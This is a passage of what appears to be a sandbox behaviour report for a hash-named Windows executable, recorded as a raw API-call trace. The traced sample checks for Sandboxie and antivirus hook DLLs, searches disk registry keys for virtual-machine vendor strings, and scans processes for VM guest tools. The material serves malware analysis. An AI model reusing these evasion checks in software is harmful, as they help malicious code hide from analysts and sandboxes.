0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 369 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 370 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 371 start_va = 0x6a0000 end_va = 0x820fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 372 start_va = 0x830000 end_va = 0x1c2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 373 start_va = 0x75cb0000 end_va = 0x768f9fff monitored = 0 entry_point = 0x75d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 374 start_va = 0x771d0000 end_va = 0x77226fff monitored = 0 entry_point = 0x771e9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 375 start_va = 0x1c30000 end_va = 0x1daffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 376 start_va = 0x290000 end_va = 0x295fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 377 start_va = 0x300000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 378 start_va = 0x2a0000 end_va = 0x2a4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 810 start_va = 0x2b0000 end_va = 0x2c5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Thread: id = 2 os_tid = 0xe28 [0056.694] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="kernel32" | out: DestinationString="kernel32") [0056.694] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x769b0000) returned 0x0 [0056.694] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="user32" | out: DestinationString="user32") [0056.694] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x773b0000) returned 0x0 [0056.847] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="advapi32" | out: DestinationString="advapi32") [0056.847] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x76c20000) returned 0x0 [0056.847] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="shell32" | out: DestinationString="shell32") [0056.847] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x75cb0000) returned 0x0 [0060.747] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0060.747] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x30ffd8 [0060.747] GetKeyboardLayoutList (in: nBuff=1, lpList=0x30ffd8 | out: lpList=0x30ffd8) returned 1 [0060.748] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fb14 | out: TokenHandle=0x18fb14*=0x74) returned 1 [0060.748] GetTokenInformation (in: TokenHandle=0x74, TokenInformationClass=0x19, TokenInformation=0x18fb18, TokenInformationLength=0x14, ReturnLength=0x18fb10 | out: TokenInformation=0x18fb18, ReturnLength=0x18fb10) returned 1 [0060.748] ExpandEnvironmentStringsW (in: lpSrc="%systemroot%\\system32\\ntdll.dll", lpDst=0x18fd54, nSize=0x104 | out: lpDst="C:\\Windows\\system32\\ntdll.dll") returned 0x1e [0060.748] CreateFileW (lpFileName="C:\\Windows\\system32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0060.791] CreateFileMappingW (hFile=0x78, lpFileMappingAttributes=0x0, flProtect=0x1000002, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x7c [0060.791] MapViewOfFile (hFileMappingObject=0x7c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1c30000 [0060.794] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd58, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe")) returned 0x5f [0060.794] wcsstr (_Str="C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe", _SubStr="7869.vmt") returned 0x0 [0060.794] NtQuerySystemInformation (in: SystemInformationClass=0x67, SystemInformation=0x18ff54, Length=0x8, ResultLength=0x0 | out: SystemInformation=0x18ff54, ResultLength=0x0) returned 0x0 [0060.794] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x18ff5c, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18ff5c, ReturnLength=0x0) returned 0x0 [0060.795] GetModuleHandleA (lpModuleName="sbiedll") returned 0x0 [0060.795] GetModuleHandleA (lpModuleName="aswhook") returned 0x0 [0060.795] GetModuleHandleA (lpModuleName="snxhk") returned 0x0 [0060.795] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x414948 [0060.796] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" [0060.796] RtlInitUnicodeString (in: DestinationString=0x18ff28, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") [0060.796] NtOpenKey (in: KeyHandle=0x18ff48, DesiredAccess=0x9, ObjectAttributes=0x18ff30*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x18ff48*=0x80) returned 0x0 [0060.796] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0060.796] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x414a58 [0060.796] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x414a58, Length=0x2c, ResultLength=0x18ff50 | out: KeyInformation=0x414a58, ResultLength=0x18ff50) returned 0x0 [0060.796] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0060.796] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x414a90 [0060.797] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x414a90, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x414a90, ResultLength=0x18ff50) returned 0x0 [0060.798] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="qemu") returned 0x0 [0060.798] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="virtio") returned 0x0 [0060.798] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="vmware") returned 0x0 [0060.798] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="vbox") returned 0x0 [0060.798] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="xen") returned 0x0 [0060.799] LocalFree (hMem=0x414a90) returned 0x0 [0060.799] NtEnumerateKey (in: KeyHandle=0x80, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0060.799] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x414a90 [0060.799] NtEnumerateKey (in: KeyHandle=0x80, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x414a90, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x414a90, ResultLength=0x18ff50) returned 0x0 [0060.800] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="qemu") returned 0x0 [0060.801] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="virtio") returned 0x0 [0060.801] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="vmware") returned 0x0 [0060.801] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="vbox") returned 0x0 [0060.801] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="xen") returned 0x0 [0060.801] LocalFree (hMem=0x414a90) returned 0x0 [0060.801] NtEnumerateKey (in: KeyHandle=0x80, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0060.801] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x414a90 [0060.801] NtEnumerateKey (in: KeyHandle=0x80, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x414a90, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x414a90, ResultLength=0x18ff50) returned 0x0 [0060.803] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="qemu") returned 0x0 [0060.803] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="virtio") returned 0x0 [0060.803] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="vmware") returned 0x0 [0060.803] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="vbox") returned 0x0 [0060.803] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="xen") returned 0x0 [0060.804] LocalFree (hMem=0x414a90) returned 0x0 [0060.804] NtEnumerateKey (in: KeyHandle=0x80, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0060.804] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x414a90 [0060.804] NtEnumerateKey (in: KeyHandle=0x80, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x414a90, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x414a90, ResultLength=0x18ff50) returned 0x0 [0060.805] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="qemu") returned 0x0 [0060.805] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="virtio") returned 0x0 [0060.805] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="vmware") returned 0x0 [0060.805] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="vbox") returned 0x0 [0060.805] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="xen") returned 0x0 [0060.806] LocalFree (hMem=0x414a90) returned 0x0 [0060.806] NtEnumerateKey (in: KeyHandle=0x80, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0060.806] LocalAlloc (uFlags=0x40, uBytes=0x7a) returned 0x414a90 [0060.806] NtEnumerateKey (in: KeyHandle=0x80, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x414a90, Length=0x7a, ResultLength=0x18ff50 | out: KeyInformation=0x414a90, ResultLength=0x18ff50) returned 0x0 [0060.807] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="qemu") returned 0x0 [0060.807] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="virtio") returned 0x0 [0060.807] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="vmware") returned 0x0 [0060.807] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="vbox") returned 0x0 [0060.807] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="xen") returned 0x0 [0060.807] LocalFree (hMem=0x414a90) returned 0x0 [0060.807] LocalFree (hMem=0x414a58) returned 0x0 [0060.808] NtClose (Handle=0x80) returned 0x0 [0060.808] LocalFree (hMem=0x414948) returned 0x0 [0060.808] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x414948 [0060.808] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" [0060.808] RtlInitUnicodeString (in: DestinationString=0x18ff28, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") [0060.808] NtOpenKey (in: KeyHandle=0x18ff48, DesiredAccess=0x9, ObjectAttributes=0x18ff30*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x18ff48*=0x80) returned 0x0 [0060.808] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0060.808] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x414a58 [0060.808] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x414a58, Length=0x2c, ResultLength=0x18ff50 | out: KeyInformation=0x414a58, ResultLength=0x18ff50) returned 0x0 [0060.808] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0060.808] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x414a90 [0060.808] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x414a90, Length=0x50, ResultLength=0x18ff50 | out: KeyInformation=0x414a90, ResultLength=0x18ff50) returned 0x0 [0060.809] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="qemu") returned 0x0 [0060.809] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="virtio") returned 0x0 [0060.809] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="vmware") returned 0x0 [0060.809] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="vbox") returned 0x0 [0060.809] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="xen") returned 0x0 [0060.809] LocalFree (hMem=0x414a90) returned 0x0 [0060.809] LocalFree (hMem=0x414a58) returned 0x0 [0060.809] NtClose (Handle=0x80) returned 0x0 [0060.810] LocalFree (hMem=0x414948) returned 0x0 [0060.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x18ff5c | out: SystemInformation=0x0, ResultLength=0x18ff5c*=0x12630) returned 0xc0000004 [0060.812] LocalAlloc (uFlags=0x40, uBytes=0x13630) returned 0x414948 [0060.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x414948, Length=0x13630, ResultLength=0x18ff5c | out: SystemInformation=0x414948, ResultLength=0x18ff5c*=0xe5d0) returned 0x0 [0060.816] wcsstr (_Str="system", _SubStr="qemu-ga.exe") returned 0x0 [0060.816] wcsstr (_Str="system", _SubStr="qga.exe") returned 0x0 [0060.816] wcsstr (_Str="system", _SubStr="windanr.exe") returned 0x0 [0060.816] wcsstr (_Str="system", _SubStr="vboxservice.exe") returned 0x0 [0060.816] wcsstr (_Str="system", _SubStr="vboxtray.exe") returned 0x0 [0060.816] wcsstr (_Str="system", _SubStr="vmtoolsd.exe") returned 0x0 [0060.816] wcsstr (_Str="system", _SubStr="prl_tools.exe") returned 0x0 [0060.816] wcsstr (_Str="smss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.816] wcsstr (_Str="smss.exe", _SubStr="qga.exe") returned 0x0 [0060.816] wcsstr (_Str="smss.exe", _SubStr="windanr.exe") returned 0x0 [0060.816] wcsstr (_Str="smss.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.816] wcsstr (_Str="smss.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.816] wcsstr (_Str="smss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.817] wcsstr (_Str="smss.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.817] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.817] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0060.817] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0060.817] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.817] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.817] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.817] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.817] wcsstr (_Str="wininit.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.817] wcsstr (_Str="wininit.exe", _SubStr="qga.exe") returned 0x0 [0060.817] wcsstr (_Str="wininit.exe", _SubStr="windanr.exe") returned 0x0 [0060.817] wcsstr (_Str="wininit.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.817] wcsstr (_Str="wininit.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.817] wcsstr (_Str="wininit.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.817] wcsstr (_Str="wininit.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.817] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.817] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0060.817] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0060.817] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.817] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.817] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.817] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.817] wcsstr (_Str="winlogon.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.817] wcsstr (_Str="winlogon.exe", _SubStr="qga.exe") returned 0x0 [0060.818] wcsstr (_Str="winlogon.exe", _SubStr="windanr.exe") returned 0x0 [0060.818] wcsstr (_Str="winlogon.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.818] wcsstr (_Str="winlogon.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.818] wcsstr (_Str="winlogon.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.818] wcsstr (_Str="winlogon.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.818] wcsstr (_Str="services.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.818] wcsstr (_Str="services.exe", _SubStr="qga.exe") returned 0x0 [0060.818] wcsstr (_Str="services.exe", _SubStr="windanr.exe") returned 0x0 [0060.818] wcsstr (_Str="services.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.818] wcsstr (_Str="services.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.818] wcsstr (_Str="services.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.818] wcsstr (_Str="services.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.818] wcsstr (_Str="lsass.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.818] wcsstr (_Str="lsass.exe", _SubStr="qga.exe") returned 0x0 [0060.818] wcsstr (_Str="lsass.exe", _SubStr="windanr.exe") returned 0x0 [0060.818] wcsstr (_Str="lsass.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.818] wcsstr (_Str="lsass.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.818] wcsstr (_Str="lsass.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.818] wcsstr (_Str="lsass.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.818] wcsstr (_Str="lsm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.818] wcsstr (_Str="lsm.exe", _SubStr="qga.exe") returned 0x0 [0060.818] wcsstr (_Str="lsm.exe", _SubStr="windanr.exe") returned 0x0 [0060.818] wcsstr (_Str="lsm.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.818] wcsstr (_Str="lsm.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.819] wcsstr (_Str="lsm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.819] wcsstr (_Str="lsm.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.819] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.820] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0060.820] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0060.820] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.820] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.820] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.820] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.820] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.820] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0060.820] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0060.820] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.820] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.820] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.820] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.820] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.820] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0060.820] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0060.820] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.820] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.820] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.820] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.820] wcsstr (_Str="explorer.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.820] wcsstr (_Str="explorer.exe", _SubStr="qga.exe") returned 0x0 [0060.820] wcsstr (_Str="explorer.exe", _SubStr="windanr.exe") returned 0x0 [0060.820] wcsstr (_Str="explorer.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.821] wcsstr (_Str="explorer.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.821] wcsstr (_Str="explorer.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.821] wcsstr (_Str="explorer.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.821] wcsstr (_Str="dwm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.821] wcsstr (_Str="dwm.exe", _SubStr="qga.exe") returned 0x0 [0060.821] wcsstr (_Str="dwm.exe", _SubStr="windanr.exe") returned 0x0 [0060.821] wcsstr (_Str="dwm.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.821] wcsstr (_Str="dwm.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.821] wcsstr (_Str="dwm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.821] wcsstr (_Str="dwm.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.821] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.821] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0060.821] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0060.821] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.821] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.821] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.821] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.821] wcsstr (_Str="spoolsv.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.821] wcsstr (_Str="spoolsv.exe", _SubStr="qga.exe") returned 0x0 [0060.821] wcsstr (_Str="spoolsv.exe", _SubStr="windanr.exe") returned 0x0 [0060.821] wcsstr (_Str="spoolsv.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.821] wcsstr (_Str="spoolsv.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.821] wcsstr (_Str="spoolsv.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.821] wcsstr (_Str="spoolsv.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.822] wcsstr (_Str="taskhost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.822] wcsstr (_Str="taskhost.exe", _SubStr="qga.exe") returned 0x0 [0060.822] wcsstr (_Str="taskhost.exe", _SubStr="windanr.exe") returned 0x0 [0060.822] wcsstr (_Str="taskhost.exe", _SubStr="vboxservice.exe") returned 0x0 [0060.822] wcsstr (_Str="taskhost.exe", _SubStr="vboxtray.exe") returned 0x0 [0060.822] wcsstr (_Str="taskhost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0060.822] wcsstr (_Str="taskhost.exe", _SubStr="prl_tools.exe") returned 0x0 [0060.822] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0060.822] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0060.822] wcsstr 